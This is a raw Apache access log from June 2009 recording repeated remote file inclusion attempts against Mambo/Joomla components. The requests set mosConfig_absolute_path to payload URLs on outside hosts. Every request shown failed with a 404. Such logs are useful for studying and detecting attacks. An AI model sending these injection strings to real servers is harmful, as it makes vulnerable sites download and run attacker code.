88.84.128.40 - - [21/Jun/2009:02:27:41 -0400] "GET /logs/access_log.Q109052900//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:02:27:41 -0400] "GET //includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:02:27:41 -0400] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:02:27:56 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 267 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:02:28:14 -0400] "GET /logs/access_log.Q109051200//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 267 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:02:28:18 -0400] "GET //includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:02:28:18 -0400] "GET /logs/access_log.Q109052900//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
83.16.182.130 - - [21/Jun/2009:02:28:18 -0400] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:28:22 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:28:22 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:02:28:22 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
